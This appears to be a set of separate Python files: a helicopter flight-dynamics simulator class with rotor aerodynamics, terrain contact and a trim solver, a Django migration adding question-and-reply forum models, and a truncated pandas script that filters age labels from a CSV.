        vi_mr/vi_tr: main/tail rotor induced velocities; psi_mr/psi_tr:
        rotor azimuths; betas: tip-path-plane flapping angles; uvw: body
        velocities; pqr: body rates; euler: attitude; xyz: NED position.
        """
        self._register_state('vi_mr', np.zeros(1, dtype=np.float))
        self._register_state('vi_tr', np.zeros(1, dtype=np.float))
        self._register_state('psi_mr', np.zeros(1, dtype=np.float))
        self._register_state('psi_tr', np.zeros(1, dtype=np.float))
        self._register_state('betas', np.zeros(2, dtype=np.float))
        self._register_state('uvw', np.zeros(3, dtype=np.float))
        self._register_state('pqr', np.zeros(3, dtype=np.float))
        self._register_state('euler', np.zeros(3, dtype=np.float))
        self._register_state('xyz', np.zeros(3, dtype=np.float))
    def reset(self, trim_cond={}):
        """Reset states to initial values and re-trim.

        @param trim_cond : partial trim-condition dict; missing keys fall
                           back to self.default_trim_cond.
        """
        self.state = self.init_state
        self.state_dots = self.init_state_dots
        input_trim_cond = copy.deepcopy(self.default_trim_cond)
        input_trim_cond.update(trim_cond)
        self.trim(input_trim_cond)
    def step_end(self):
        """Wrap all angular states back into [-pi, pi] after each step."""
        self.state['psi_mr'] = pi_bound(self.state['psi_mr'])
        self.state['psi_tr'] = pi_bound(self.state['psi_tr'])
        self.state['betas'] = pi_bound(self.state['betas'])
        self.state['euler'] = pi_bound(self.state['euler'])
    @property
    def MR(self):
        """Main-rotor parameter sub-dict."""
        return self.HELI['MR']
    @property
    def TR(self):
        """Tail-rotor parameter sub-dict."""
        return self.HELI['TR']
    @property
    def FUS(self):
        """Fuselage parameter sub-dict."""
        return self.HELI['FUS']
    @property
    def HT(self):
        """Horizontal-tail parameter sub-dict."""
        return self.HELI['HT']
    @property
    def VT(self):
        """Vertical-tail parameter sub-dict."""
        return self.HELI['VT']
    @property
    def WN(self):
        """Wing parameter sub-dict."""
        return self.HELI['WN']
    def __precalculations(self):
        """Derive time-invariant quantities (geometry offsets, rotor
        coefficients, inertia matrix) from the raw parameter dicts."""
        # Component positions wrt CG locations
        # 1/12 comes from inch to feet conversion
        self.MR['H'] = (self.MR['WL']-self.HELI['WL_CG'])/12 # [ft]
        self.MR['D'] = (self.MR['FS']-self.HELI['FS_CG'])/12
        self.FUS['H'] = (self.FUS['WL']-self.HELI['WL_CG'])/12
        self.FUS['D'] = (self.FUS['FS']-self.HELI['FS_CG'])/12
        self.WN['H'] = (self.WN['WL']-self.HELI['WL_CG'])/12
        self.WN['D'] = (self.WN['FS']-self.HELI['FS_CG'])/12
        self.HT['H'] = (self.HT['WL']-self.HELI['WL_CG'])/12
        self.HT['D'] = (self.HT['FS']-self.HELI['FS_CG'])/12
        self.VT['H'] = (self.VT['WL']-self.HELI['WL_CG'])/12
        self.VT['D'] = (self.VT['FS']-self.HELI['FS_CG'])/12
        self.TR['H'] = (self.TR['WL']-self.HELI['WL_CG'])/12
        self.TR['D'] = (self.TR['FS']-self.HELI['FS_CG'])/12
        #
        self.HELI['M']=self.HELI['WT']/self.ENV['GRAV'] # [slug] vehicle mass
        # Main Rotor precalculations
        self.MR['OMEGA'] = self.MR['RPM']*2*math.pi/60 # [rad/s] MR rev speed
        self.MR['V_TIP'] = self.MR['R']*self.MR['OMEGA'] # [ft/s] MR tip speed
        self.MR['FR'] = self.MR['CD0']*self.MR['R']*self.MR['B']*self.MR['C'] # eff.frontal area MR
        self.MR['SOL'] = self.MR['B']*self.MR['C']/(self.MR['R']*math.pi) # MR solidity (SIGMA)
        self.MR['A_SIGMA'] = self.MR['A']*self.MR['SOL'] # product(lift-curve-slope & solidity)
        self.MR['GAM_OM16_DRO'] = self.MR['A']*self.MR['C']*self.MR['R']**4/self.MR['IB']* \
            self.MR['OMEGA']/16*(1+8/3*self.MR['E']/self.MR['R']) # one sixth the product(lock# and rotor ang.rate), divided by air density
        # primary(direct)flapping stiffness [rad/sec2]
        self.MR['DL_DB1'] = self.MR['B']/2* \
            (1.5*self.MR['IB']*self.MR['E']/self.MR['R']*self.MR['OMEGA']**2)
        # cross(off-axis)flapping stiffness [rad/sec2], divided by air density
        self.MR['DL_DA1_DRO'] = 0.5*self.MR['A']*self.MR['B']*self.MR['C']*self.MR['R']*self.MR['V_TIP']**2*self.MR['E']/6
        self.MR['COEF_TH'] = 0.25*self.MR['V_TIP']*self.MR['R']*self.MR['A']*self.MR['B']*self.MR['C'] # coefficient for thrust calculation
        # Tail Rotor precalculations
        self.TR['OMEGA'] = self.TR['RPM']*2*math.pi/60 # [rad/s] TR rev speed
        self.TR['FR'] = self.TR['CD0']*self.TR['R']*self.TR['B']*self.TR['C'] # eff.frontal area TR
        self.TR['V_TIP'] = self.TR['R']*self.TR['OMEGA'] # [ft/s] TR tip speed
        self.TR['SOL'] = self.TR['B']*self.TR['C']/(self.TR['R']*math.pi) # TR solidity (SIGMA)
        self.TR['COEF_TH'] = 0.25*self.TR['V_TIP']*self.TR['R']*self.TR['A']*self.TR['B']*self.TR['C'] # coefficient for thrust calculation
        # Inertia
        #print(self.HELI['IX'])
        self.HELI['I'] = np.array([ [self.HELI['IX'] , 0.0 , -self.HELI['IXZ']],
                                    [0.0 , self.HELI['IY'] , 0.0 ],
                                    [-self.HELI['IXZ'] , 0.0 , self.HELI['IZ'] ] ], dtype=np.float)
        self.HELI['IINV'] = np.linalg.inv(self.HELI['I'])
    def set_wind(self, wind_ned: np.ndarray = np.zeros(3, np.float)):
        """Set the constant wind velocity (NED, earth frame) [ft/s]."""
        # wind velocity in earth frame:
        self.WIND_NED = wind_ned
    def _altitude_to_air_properties(self, altitude):
        """Calculate Air temperature and density from altitude.
        """
        temp = self.ENV['T0'] - self.ENV['LAPSE']*altitude # [R] Temperature at the current altitude
        rho = self.ENV['RO_SEA']*(temp/self.ENV['T0'])**((self.ENV['GRAV']/(self.ENV['LAPSE']*self.ENV['R']))-1.0) # [slug/ft**3]
        return temp, rho
    def __get_ground_height_from_hmap(self):
        """Bilinearly interpolate terrain height under the current NED
        position from the heightmap (vehicle at map center for xy = 0)."""
        x_ = self.ENV["NS_MAX"] / self.terrain_hmap.shape[0] # terrain x size per pixel
        y_ = self.ENV["EW_MAX"] / self.terrain_hmap.shape[1] # terrain y size per pixel
        x_loc = (self.state['xyz'][0]) / x_ + self.terrain_hmap.shape[0] // 2
        y_loc = (self.state['xyz'][1]) / y_ + self.terrain_hmap.shape[1] // 2
        # make sure that get height from hmap
        # NOTE(review): the y clamping below tests against shape[0]; for a
        # non-square heightmap shape[1] looks intended — confirm.
        if x_loc < 0:
            x_loc = 0
        elif x_loc > self.terrain_hmap.shape[0] - 1:
            x_loc = self.terrain_hmap.shape[0] - 1
        if y_loc < 0:
            y_loc = 0
        elif y_loc > self.terrain_hmap.shape[0] - 1:
            y_loc = self.terrain_hmap.shape[0] - 1
        x_ind = math.floor(x_loc)
        y_ind = math.floor(y_loc)
        middle = self.terrain_hmap[y_ind, x_ind]
        if x_ind == self.terrain_hmap.shape[0] - 1 : x_ind = self.terrain_hmap.shape[0] - 2
        if y_ind == self.terrain_hmap.shape[1] - 1 : y_ind = self.terrain_hmap.shape[1] - 2
        # NOTE(review): 'north' advances the column index and 'east' the row
        # index — verify this matches the heightmap's axis convention.
        north = self.terrain_hmap[y_ind, x_ind + 1]
        east = self.terrain_hmap[y_ind + 1, x_ind]
        height = middle + (north - middle) * (x_loc - x_ind) + (east - middle) * (y_loc - y_ind)
        return height
    def _does_hit_ground(self, altitude):
        """Return True when *altitude* is at/below the ground-contact altitude."""
        return altitude - self.ground_touching_altitude() < 0.0
    def ground_touching_altitude(self):
        """Altitude [ft] at which the airframe touches local terrain."""
        return self.__get_ground_height_from_hmap() + self.HELI['WL_CG']/12 # divide by 12 to make inch to feet
    def _calc_mr_fm(self, rho, coll, lon, lat, betas, uvw_air, pqr, vi_mr, psi_mr):
        """Calculate Forces and Moments caused by Main Rotor
        ans Main Rotor Dynamics
        """
        ### Calculate required parameters first.
        # one sixth the product(lock# and rotor ang.rate)
        GAM_OM16 = rho*self.MR['GAM_OM16_DRO']
        # flapping aero cpl(flapping coupling factor)
        KC = (0.75*self.MR['OMEGA']*self.MR['E']/self.MR['R']/GAM_OM16)+self.MR['K1']
        # flapping x-cpl coef
        ITB2_OM = self.MR['OMEGA']/(1+(self.MR['OMEGA']/GAM_OM16)**2)
        # flapping primary resp(inverse TPP lag) [rad/s]
        ITB = ITB2_OM*self.MR['OMEGA']/GAM_OM16
        # primary(direct)flapping stiffness [rad/sec2]
        DL_DB1 = self.MR['DL_DB1']
        # cross(off-axis)flapping stiffness [rad/sec2]
        DL_DA1 = rho*self.MR['DL_DA1_DRO']
        ## MR Force Moments and inflow dynamics.
        v_adv_2 = uvw_air[0]*uvw_air[0]+uvw_air[1]*uvw_air[1]
        wr = uvw_air[2] + (betas[0]-self.MR['IS'])*uvw_air[0] - betas[1]*uvw_air[1] # z-axis vel re rotor plane
        wb = wr + 0.66667*self.MR['V_TIP']*(coll+0.75*self.MR['TWST']) + \
            v_adv_2/self.MR['V_TIP']*(coll+0.5*self.MR['TWST']) # z-axis vel re blade (equivalent)
        thrust_mr = (wb - vi_mr[0]) * rho*self.MR['COEF_TH']
        # Momentum-theory induced-velocity dynamics.
        vi_mr_dot = np.zeros(1, dtype=np.float)
        vi_mr_dot[0] = 0.75*math.pi/self.MR['R']*(thrust_mr/(2*math.pi*rho*self.MR['R']*self.MR['R']) - vi_mr[0]*math.sqrt(v_adv_2+(wr-vi_mr[0])**2))
        # MR induced flow power consumption
        induced_power = thrust_mr*(vi_mr[0]-wr)
        # MR profile drag power consumption
        profile_power = 0.5*rho*(self.MR['FR']/4)*self.MR['V_TIP']*(self.MR['V_TIP']*self.MR['V_TIP']+ \
            3.0*v_adv_2)
        power_mr = induced_power+profile_power
        torque_mr = power_mr/self.MR['OMEGA']
        # thrust coeff.
        CT = thrust_mr/(rho*math.pi*self.MR['R']*self.MR['R']*self.MR['V_TIP']*self.MR['V_TIP'])
        CT = max([CT, 0.0])
        ## Dihedral effect on TPP
        # TPP dihedral effect(late.flap2side vel)
        DB1DV = 2/self.MR['V_TIP']*(8*CT/self.MR['A_SIGMA']+(math.sqrt(0.5*CT)))
        DA1DU = -DB1DV # TPP pitchup with speed
        ### MR TPP Dynamics
        #wake_fn = 0.5 + 0.5*np.tanh(10*(np.abs(uvw_air[0])/self.HELI['VTRANS']-1.0))
        wake_fn = 1.0 if (math.fabs(uvw_air[0]) > self.HELI['VTRANS']) else 0.0
        a_sum = betas[1]-lat+KC*betas[0]+DB1DV*uvw_air[1]*(1+wake_fn)
        b_sum = betas[0]+lon-KC*betas[1]+DA1DU*uvw_air[0]*(1+2*wake_fn)
        betas_dot = np.zeros(2, dtype=np.float)
        betas_dot[0] = -ITB*b_sum-ITB2_OM*a_sum-pqr[1]
        betas_dot[1] = -ITB*a_sum+ITB2_OM*b_sum-pqr[0]
        ### Transmission dynamics of MR
        psi_mr_dot = np.zeros(1, dtype=np.float)
        psi_mr_dot[0] = self.MR['OMEGA']
        ### Compute main rotor force and moment components
        X_MR=-thrust_mr*(betas[0]-self.MR['IS'])
        Y_MR=thrust_mr*betas[1]
        Z_MR=-thrust_mr
        L_MR=Y_MR*self.MR['H']+DL_DB1*betas[1]+DL_DA1*(betas[0]+lon-self.MR['K1']*betas[1])
        M_MR=Z_MR*self.MR['D']-X_MR*self.MR['H']+DL_DB1*betas[0]+DL_DA1*(-betas[1]+lat-self.MR['K1']*betas[0])
        N_MR=torque_mr
        force_mr = np.array([X_MR,Y_MR,Z_MR], dtype=np.float)
        moment_mr = np.array([L_MR, M_MR, N_MR], dtype=np.float)
        return force_mr, moment_mr, power_mr, betas_dot, vi_mr_dot, psi_mr_dot
    def _calc_tr_fm(self, rho, pedal, uvw_air, pqr, vi_tr, psi_tr):
        """Calculate Forces and Moments caused by Tail Rotor
        """
        ## TR Force Moments and inflow dynamics.
        v_adv_2 = (uvw_air[2]+pqr[1]*self.TR['D'])**2 + uvw_air[0]**2
        vr = -(uvw_air[1] - pqr[2]*self.TR['D'] + pqr[0]*self.TR['H']) # vel re rotor plane
        vb = vr + 0.66667*self.TR['V_TIP']*(pedal+0.75*self.TR['TWST']) + \
            v_adv_2/self.TR['V_TIP']*(pedal+0.5*self.TR['TWST'])# vel re blade plane (equivalent)
        thrust_tr = (vb - vi_tr[0])*rho*self.TR['COEF_TH']
        vi_tr_dot = np.zeros(1, dtype=np.float)
        vi_tr_dot[0] = 0.75*math.pi/self.TR['R']*(thrust_tr/(2*math.pi*rho*self.TR['R']**2) - vi_tr[0]*math.sqrt(v_adv_2+(vr-vi_tr[0])**2))
        vi_tr_dot[0] *= 0.5 # slow down inflow dynamics due to numerical unstability.
        ### Transmission dynamics of TR
        psi_tr_dot = np.zeros(1, dtype=np.float)
        psi_tr_dot[0] = self.TR['OMEGA']
        power_tr = thrust_tr*(vi_tr[0]-vr)
        # torque=power_tr/self.TR['OMEGA'];
        ### Compute tail rotor force and moment components
        Y_TR=thrust_tr
        L_TR=Y_TR*self.TR['H']
        N_TR=-Y_TR*self.TR['D']
        force_tr = np.array([0,Y_TR,0], dtype=np.float)
        moment_tr = np.array([L_TR, 0, N_TR], dtype=np.float)
        return force_tr, moment_tr, power_tr, vi_tr_dot, psi_tr_dot
    def _calc_fus_fm(self, rho, uvw_air, vi_mr):
        """Calculate Forces and Moments caused by Fuselage
        """
        wa_fus = uvw_air[2]-vi_mr[0] # Include rotor downwash on fuselage
        wa_fus += (wa_fus>0)*EPS # Make it nonzero!
        d_fw=(uvw_air[0]/(-wa_fus)*(self.MR['H']-self.FUS['H']))-(self.FUS['D']-self.MR['D']) # Pos of downwash on fuselage
        d_fw *= self.FUS['COR'] #emprical correction
        rho_half = 0.5*rho
        X_FUS = rho_half*self.FUS['XUU']*math.fabs(uvw_air[0])*uvw_air[0]
        Y_FUS = rho_half*self.FUS['YVV']*math.fabs(uvw_air[1])*uvw_air[1]
        Z_FUS = rho_half*self.FUS['ZWW']*math.fabs(wa_fus)*wa_fus
        L_FUS = Y_FUS*self.FUS['H']
        M_FUS = Z_FUS*d_fw-X_FUS*self.FUS['H']
        # Fuselage power consumption
        power_parasite=-X_FUS*uvw_air[0]-Y_FUS*uvw_air[1]-Z_FUS*wa_fus
        power_fus=power_parasite
        force_fus = np.array([X_FUS,Y_FUS,Z_FUS], dtype=np.float)
        moment_fus = np.array([L_FUS, M_FUS, 0], dtype=np.float)
        return force_fus, moment_fus, power_fus
    def _calc_ht_fm(self, rho, uvw_air, pqr, vi_mr):
        """Calculate Forces and Moments caused by Horizontal Tail
        """
        # downwash impinges on tail?
        v_dw = max([vi_mr[0]-uvw_air[2], EPS])
        d_dw=(uvw_air[0]/v_dw*(self.MR['H']-self.HT['H'])) \
            - (self.HT['D']-self.MR['D']-self.MR['R'])
        if d_dw >0 and d_dw<self.MR['R']: #Triangular downwash
            eps_ht=2*(1-d_dw/self.MR['R'])
        else:
            eps_ht=0
        wa_ht = uvw_air[2]-eps_ht*vi_mr[0]+self.HT['D']*pqr[1] # local z-vel at h.t
        if math.fabs(wa_ht) > 0.3*math.fabs(uvw_air[0]): # surface stalled ?
            vta_ht = math.sqrt(uvw_air[0]**2+uvw_air[1]**2+wa_ht**2) #
            Z_HT=0.5*rho*self.HT['ZMAX']*math.fabs(vta_ht)*wa_ht # circulation
        else:
            Z_HT=0.5*rho*(self.HT['ZUU']*math.fabs(uvw_air[0])*uvw_air[0]+self.HT['ZUW']*math.fabs(uvw_air[0])*wa_ht) # circulation
        M_HT = Z_HT*self.HT['D'] # pitching moment
        force_ht = np.array([0,0,Z_HT], dtype=np.float)
        moment_ht = np.array([0, M_HT, 0], dtype=np.float)
        return force_ht, moment_ht
    def _calc_vt_fm(self, rho, uvw_air, pqr, vi_tr):
        """Calculate Forces and Moments caused by Vertical Tail
        """
        va_vt=uvw_air[1]+vi_tr[0]-self.VT['D']*pqr[2]
        if math.fabs(va_vt) > 0.3*math.fabs(uvw_air[0]):
            vta_vt=math.sqrt(uvw_air[0]**2+va_vt**2)
            Y_VT=0.5*rho*self.VT['YMAX']*math.fabs(vta_vt)*va_vt
        else:
            Y_VT=0.5*rho*(self.VT['YUU']*math.fabs(uvw_air[0])*uvw_air[0]+self.VT['YUV']*math.fabs(uvw_air[0])*va_vt)
        L_VT=Y_VT*self.VT['H']
        N_VT=-Y_VT*self.VT['D']
        force_vt = np.array([0,Y_VT,0], dtype=np.float)
        moment_vt = np.array([L_VT, 0, N_VT], dtype=np.float)
        return force_vt, moment_vt
    def _calc_wn_fm(self, rho, uvw_air, vi_mr):
        """Calculate Forces and Moments caused by Wing
        """
        ## Wing
        if self.WN["ZUW"]==0.0:
            X_WN, Z_WN = 0.0, 0.0
        else:
            wa_wn= uvw_air[2]-vi_mr[0] # local z-vel at wing
            vta_wn=math.sqrt(uvw_air[0]*uvw_air[0]+wa_wn*wa_wn)
            if math.fabs(wa_wn) > 0.3*math.fabs(uvw_air[0]): # surface stalled ?
                Z_WN=0.5*rho*self.WN['ZMAX']*math.fabs(vta_wn)*wa_wn
            else:
                Z_WN=0.5*rho*(self.WN['ZUU']*uvw_air[0]**2+self.WN['ZUW']*uvw_air[0]*wa_wn)
            X_WN=-0.5*rho/math.pi/vta_wn**2*(self.WN['ZUU']*uvw_air[0]*uvw_air[0]+self.WN['ZUW']*uvw_air[0]*wa_wn)**2 # ? induced drag
        power_wn=math.fabs(X_WN*uvw_air[0]) # wing power
        force_wn = np.array([X_WN,0,Z_WN], dtype=np.float)
        moment_wn = np.array([0, 0, 0], dtype=np.float)
        return force_wn, moment_wn, power_wn
    def dynamics(self, state, action, set_observation=False):
        """Compute the state time-derivatives for *state* and *action*.

        @param state  : dict of state arrays (see __register_states)
        @param action : 4-vector in [-1, 1]: collective, longitudinal
                        cyclic, lateral cyclic, pedal
        @param set_observation : when True also refresh self.observation
        @return state_dots : dict of state derivatives
        """
        #
        state_dots = copy.deepcopy(self.state_dots)
        #
        vi_mr = state['vi_mr']
        vi_tr = state['vi_tr']
        psi_mr = state['psi_mr']
        psi_tr = state['psi_tr']
        betas = state['betas']
        uvw = state['uvw']
        pqr = state['pqr']
        euler = state['euler']
        xyz = state['xyz']
        ### Control input calculations
        # Map normalized [-1, 1] actions to swashplate angles in radians.
        coll = D2R*( self.HELI['COL_OS'] +
            0.5*action[0]*(self.HELI['COL_H'] - self.HELI['COL_L']) +
            0.5*(self.HELI['COL_H'] + self.HELI['COL_L']) )
        lon = D2R*( 0.5*action[1]*(self.HELI['LON_H'] - self.HELI['LON_L']) +
            0.5*(self.HELI['LON_H'] + self.HELI['LON_L']) )
        lat = D2R*( 0.5*action[2]*(self.HELI['LAT_H'] - self.HELI['LAT_L']) +
            0.5*(self.HELI['LAT_H'] + self.HELI['LAT_L']) )
        pedal = D2R*( self.HELI['PED_OS'] + 0.5*action[3]*(self.HELI['PED_H'] - self.HELI['PED_L']) +
            0.5*(self.HELI['PED_H'] + self.HELI['PED_L']) )
        ### Kinematic calculations
        earth2body = euler_to_rotmat(euler) # Earth to Body DCM matrix
        body2earth = earth2body.transpose() # Body to Earth DCM matrix
        pqr_to_eulerdot = pqr_to_eulerdot_mat(euler) # par to eulerdot function.
        euler_dot = pqr_to_eulerdot@pqr # calculated eulerdot..
        ned_vel = body2earth@uvw # ned velocity
        ### Airspeed calculations
        uvw_air = uvw - earth2body@self.WIND_NED
        #### Some Observations ####
        power_climb = self.HELI['WT']*(-ned_vel[2]) # Climbing power [hp]
        ### Atmosphere calculations
        temperature, rho = self._altitude_to_air_properties(-xyz[2])
        ### Main Rotor
        force_mr, moment_mr, power_mr, betas_dot, vi_mr_dot, psi_mr_dot = self._calc_mr_fm(rho, coll, lon, lat, betas, uvw_air, pqr, vi_mr, psi_mr)
        force_tr, moment_tr, power_tr, vi_tr_dot, psi_tr_dot = self._calc_tr_fm(rho, pedal, uvw_air, pqr, vi_tr, psi_tr)
        force_fus, moment_fus, power_fus = self._calc_fus_fm(rho, uvw_air, vi_mr)
        force_ht, moment_ht = self._calc_ht_fm(rho, uvw_air, pqr, vi_mr)
        force_vt, moment_vt = self._calc_vt_fm(rho, uvw_air, pqr, vi_tr)
        force_wn, moment_wn, power_wn = self._calc_wn_fm(rho, uvw_air, vi_mr)
        # Other power consumptions are counted for main rotor torque
        power_extra_mr = power_climb + power_fus
        extra_mr_torque = power_extra_mr / self.MR['OMEGA']
        moment_mr[2] += extra_mr_torque
        power_total = power_mr + power_tr + power_extra_mr + power_wn + 550*self.HELI['HP_LOSS']
        force_gravity = earth2body@np.array([0,0,self.HELI['WT']])
        force_total = force_mr + force_tr + force_fus + force_ht + force_vt + force_wn + force_gravity
        moment_total = moment_mr + moment_tr + moment_fus + moment_ht + moment_vt + moment_wn
        # Ground contact: spring-damper normal force in the earth z-axis.
        if self._does_hit_ground(-xyz[2]):
            w = 5.0
            zeta = 2.0
            K = w*w * self.HELI["M"]
            C = 2 * zeta * self.HELI["M"] * w
            cxdot = C * ned_vel[2]
            kx = K * (xyz[2] + self.ground_touching_altitude())
            force_ground = earth2body@ np.array([0.0, 0.0, -(cxdot + kx) + EPS])
            force_total += force_ground
        body_acc = force_total/self.HELI['M']
        uvw_dot = body_acc - cross_product(pqr, uvw)
        pqr_dot = self.HELI['IINV']@(moment_total - cross_product(pqr, self.HELI['I']@pqr))
        xyz_dot = ned_vel
        ### State derivatives
        state_dots['vi_mr'] = vi_mr_dot
        state_dots['vi_tr'] = vi_tr_dot
        state_dots['psi_mr'] = psi_mr_dot
        state_dots['psi_tr'] = psi_tr_dot
        state_dots['betas'] = betas_dot
        state_dots['uvw'] = uvw_dot
        state_dots['pqr'] = pqr_dot
        state_dots['euler'] = euler_dot
        state_dots['xyz'] = xyz_dot
        if set_observation:
            ### Observation calculations
            power_total_hp = power_total/550 # [hp] Power consumption in Horse Power
            #tas = np.linalg.norm(uvw_air) # true air speed in ft/s
            #sideslip_deg = R2D*np.arcsin(uvw_air[1]/(tas+EPS))# [deg] Sideslip angle
            #aoa_deg = R2D*np.arctan2(uvw_air[2], (uvw_air[0]+EPS)) # [deg] % Angle of Attack
            alt_gr = -xyz[2] - self.__get_ground_height_from_hmap()
            # These two are not need for now.
            #ground_speed = np.linalg.norm(ned_vel[:2]) # [ft/s] Ground speed
            #track_angle_deg = R2D*np.arctan2(ned_vel[1],ned_vel[0]) # [deg] Track angle
            # Packed in the order declared by _observations.
            self.observation = np.array([power_total_hp, \
                uvw_air[0], uvw_air[1], uvw_air[2], \
                ned_vel[0], ned_vel[1], ned_vel[2], \
                euler[0], euler[1], euler[2], \
                pqr[0], pqr[1], pqr[2],
                xyz[0], xyz[1], -xyz[2], alt_gr],
                )
        #print(20*"-")
        #print(f"{t1-t0}\n{t2-t1}\n{t3-t2}\n{t4-t3}\n{t5-t4}\n{t6-t5}\n{t7-t6}\n{t8-t7}\n{t9-t8}\n{t10-t9}\n{t11-t10}\n{t12-t11}\n{t13-t12}\n{t14-t13}\n{t15-t14}\n{t16-t15}\n**************************")
        #print(t16-t0)
        return state_dots
    def trim(self, params):
        """This function trims the helicopter given the parameters.
        If necessary, user can specify velocity of helicopter in earth frame along with
        yaw_rate which should be deg/sec. Other parameters like rotor azimuths, yaw angle and
        north east locations and ground altitude can also be specified.
        """
        # First, fix some parameters which are not iterated through trim algorithm.
        # However, these parameters will affect the trim.
        self.state['euler'][-1] = params["yaw"]
        self.state['psi_mr'][0] = params["psi_mr"]
        self.state['psi_tr'][0] = params["psi_tr"]
        self.state['xyz'][0] = params["xy"][0]
        self.state['xyz'][1] = params["xy"][1]
        cg_from_bottom = -self.ground_touching_altitude()
        self.state['xyz'][2] = cg_from_bottom-params["gr_alt"]
        self.last_action = np.zeros(4)
        # Newton iteration over 16 unknowns: 12 normalized states + 4 actions.
        n_vars = 16
        y_target = np.zeros(n_vars, dtype=np.float)
        y_target[-4] = params['yaw_rate']
        y_target[-3:] = np.array(params['ned_vel'], dtype=FLOAT_TYPE)/self.MR['R']
        uvw0 = np.array(params['ned_vel'], dtype=FLOAT_TYPE)/self.MR['V_TIP']
        x = np.array([0.05, 0.05, 0, 0, # vi_mr, vi_tr, betas
            uvw0[-3], uvw0[-2], uvw0[-1], # uvw
            0, 0, y_target[-4], # pqr
            -0.01, 0.01, # phi, theta
            0.0, 0.0, 0.0, 0.0, # actions
            ], dtype=np.float)
        y = self.__trim_fcn(x)
        tol = (y-y_target).transpose()@(y-y_target)
        s_time = time.perf_counter()
        while tol>EPS:
            # Central-difference Jacobian of the residual.
            dydx = []
            for i in range(n_vars):
                dxi = np.zeros(n_vars); dxi[i]+=EPS
                dydxi = (self.__trim_fcn(x+dxi)-self.__trim_fcn(x-dxi))/(2*EPS)
                dydx.append(dydxi)
            dydx = np.stack(dydx, axis=-1)
            step_dir = np.linalg.inv(dydx)@(y-y_target)
            # Backtracking line search: halve the step until tolerance improves.
            step_size = 1.0
            for j in range(10):
                x_new = x - step_size*step_dir # candidate new step
                y_new = self.__trim_fcn(x_new)
                tol_new = (y_new-y_target).transpose()@(y_new-y_target)
                step_size *= 0.5
                if tol_new < tol: break
                if j==9: break
            x, y, tol = x_new, y_new, tol_new
            if (time.perf_counter() - s_time) > 5.0:
                assert False, "Trim failed, please try a better trim condition!"
        # Finalize the trim algorithm by assigning solved states to the system.
        self.state['vi_mr'] = x[0:1]*self.MR['V_TIP']
        self.state['vi_tr'] = x[1:2]*self.TR['V_TIP']
        self.state['betas'] = x[2:4]
        self.state['uvw'] = x[4:7]*self.MR['V_TIP']
        self.state['pqr'] = x[7:10]*self.MR['OMEGA']
        self.state['euler'][:-1] = x[10:12]
        self.last_action = x[12:16]
        # set state dots
        self.state_dots = self.dynamics(self.state, self.last_action, set_observation=True)
    def __trim_fcn(self, x):
        """Normalized residual vector for the trim Newton iteration.

        Unpacks the candidate solution *x* into a trial state + action,
        evaluates dynamics(), and returns the normalized state derivatives
        (all of which must match y_target at trim).
        """
        state = copy.deepcopy(self.state)
        state['vi_mr'] = x[0:1]*self.MR['V_TIP']
        state['vi_tr'] = x[1:2]*self.TR['V_TIP']
        state['betas'] = x[2:4]
        state['uvw'] = x[4:7]*self.MR['V_TIP']
        state['pqr'] = x[7:10]*self.MR['OMEGA']
        state['euler'][:-1] = x[10:12]
        action = x[12:16]
        state_dots = self.dynamics(state, action)
        y = np.concatenate([state_dots['vi_mr']/self.MR['V_TIP'],
            state_dots['vi_tr']/self.TR['V_TIP'],
            state_dots['betas'],
            state_dots['uvw']/self.MR['V_TIP'],
            state_dots['pqr']/self.MR['OMEGA'],
            state_dots['euler'],
            state_dots['xyz']/self.MR['R']])
        return y
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2017-03-16 19:02
from __future__ import unicode_literals
from django.db import migrations, models
# Creates the Followers/Questions/Replies/Requests/ThreadReplies models and
# adds a score field (plus an email type change) to the existing Profile.
class Migration(migrations.Migration):
    dependencies = [
        ('threads', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Followers',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('user_name', models.CharField(max_length=100, verbose_name='User Name')),
                ('follower', models.CharField(max_length=100, verbose_name='User Name')),
            ],
        ),
        migrations.CreateModel(
            name='Questions',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('question', models.CharField(max_length=100, verbose_name='Question')),
                ('user_name', models.CharField(max_length=100, verbose_name='User Name')),
                ('posted', models.DateTimeField(auto_now_add=True)),
                ('domain', models.CharField(max_length=100, verbose_name='Domain')),
            ],
            options={
                'verbose_name_plural': 'Questions',
                'verbose_name': 'Questions',
            },
        ),
        migrations.CreateModel(
            name='Replies',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('question_id', models.IntegerField()),
                ('posted', models.DateTimeField(auto_now_add=True)),
                ('rank', models.IntegerField()),
                ('reply', models.CharField(max_length=100, verbose_name='Reply')),
                ('votes', models.IntegerField()),
                ('domain', models.CharField(max_length=100, verbose_name='Domain')),
            ],
            options={
                'verbose_name_plural': 'Replies',
                'verbose_name': 'Replies',
            },
        ),
        migrations.CreateModel(
            name='Requests',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('user_name', models.CharField(max_length=100, verbose_name='User Name')),
                ('requestor', models.CharField(max_length=100, verbose_name='User Name')),
            ],
        ),
        migrations.CreateModel(
            name='ThreadReplies',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('reply_id', models.IntegerField()),
                ('reply', models.CharField(max_length=100, verbose_name='Reply')),
                ('votes', models.IntegerField()),
                ('rank', models.IntegerField()),
                ('posted', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'verbose_name_plural': 'Thread Replies',
                'verbose_name': 'Thread Replies',
            },
        ),
        # Existing Profile rows get score=0 once; no model-level default kept.
        migrations.AddField(
            model_name='profile',
            name='score',
            field=models.IntegerField(default=0),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='profile',
            name='email_id',
            field=models.EmailField(max_length=254),
        ),
    ]
|
import pandas as pd
import pickle
import numpy as np
import sys
# Build an image-filename -> age dict for the training set and pickle it.
df = pd.read_csv("imageLinksWithAgeAndGender.csv")
print(df.shape)
# Keep only two-character age strings; everything else becomes NaN, then 0.
df['age' ] = df['age'].loc[df['age'].str.len() ==2]
df['age'] = df['age'].fillna(0)
# Keep only age values occurring more than 10 times in the dataset.
strs = df['age'].value_counts()
pos = strs.loc[df['age'].value_counts() > 10]
pos = pos.index.tolist()
df['age'] = df['age'].loc[df['age'].isin(pos)]
# NOTE(review): dropna(inplace=True) on the column Series does not remove
